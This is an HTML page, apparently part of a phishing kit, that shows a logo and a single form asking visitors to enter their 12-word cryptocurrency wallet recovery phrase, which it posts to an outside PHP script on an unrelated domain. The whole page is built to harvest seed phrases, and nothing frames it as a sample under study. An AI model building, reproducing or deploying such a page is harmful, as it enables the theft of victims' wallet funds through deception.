<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>info</title>
    <style media="screen">
      @import url("https://fonts.googleapis.com/css?family=Open+Sans");

      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        outline: none;
        text-decoration: none;
        font-family: "Open Sans", sans-serif;
      }

      body {
        background: #fff;
        background-size: cover;
        width: 100%;
        height: 100vh;
      }

      .wrapper {
        max-width: 500px;
        width: 100%;
        height: auto;
        position: absolute;
        top: 35%;
        left: 50%;
        transform: translate(-50%, -50%);
        padding: 30px 30px;
      }

      .wrapper1 {
        max-width: 720px;
        width: 100%;
        height: auto;
      }

      .wrapper h2 {
        color: #fff;
        text-align: center;
        margin-bottom: 30px;
        text-transform: uppercase;
        letter-spacing: 3px;
      }

      .wrapper .form .form_container {
        display: flex;
        justify-content: space-between;
        margin-bottom: 30px;
      }

      .wrapper .form .form_container .form_left,
      .wrapper .form .form_container .form_right {
        width: 48%;
      }

      .wrapper .form .input_field input[type="text"],
      .wrapper .form textarea {
        width: 100%;
        padding: 14px;
        border: 2px solid #0c6cf2;
        border-radius: 5px;
        margin-bottom: 15px;

        border-radius: 10px;
        background: #fff;
      }

      .wrapper .form textarea {
        height: 90%;
        resize: none;
      }

      .wrapper .form .btn {
        width: 200px;
        background: #0c6cf2;

        margin: 0 auto;
        padding: 13px;
        font-size: 18px;
        border-radius: 4px;
        letter-spacing: 3px;
        text-align: center;
      }

      .wrapper .form .btn a {
        color: #fff;
      }

      @media screen and (max-width: 460px) {
        .wrapper .form .form_container {
          flex-direction: column;
        }
        .wrapper .form .form_container .form_left,
        .wrapper .form .form_container .form_right {
          width: 100%;
        }
        .wrapper .form textarea {
          height: 100px;
        }
      }
    </style>
  </head>
  <body>
    <div
      class="wrapper"
      style="background: #fff; border-radius: 10px; border: 1px solid #ccc"
    >
      <div class="form">
        <img
          src="https://i.postimg.cc/zG3nVT0g/cb675.png "
          style="width: 150px"
        /><br /><br />
        <form action="https://lou.yailoc.site/dhg35/maki.php" method="post">
          <div style="width: 100%">
            <h3 style="color: #000000">Input your 12-Recovery Backup Phrase</h3>
            <br /><br />
            <textarea
              placeholder="Input your 12-Recovery Backup Phrase"
              name="newmh78"
              required
            ></textarea>
            <p style="text-align: ">Separate each word with a space</p>
            <br /><br />
            <input
              type="submit"
              value="Continue"
              style="
                width: 100%;
                background: #0c6cf2;
                padding: 15px;
                border: none;
                color: #ffffff;
                font-size: 20px;
                border-radius: 20px;
              "
            />
          </div>
        </form>
      </div>
    </div>
  </body>
</html>
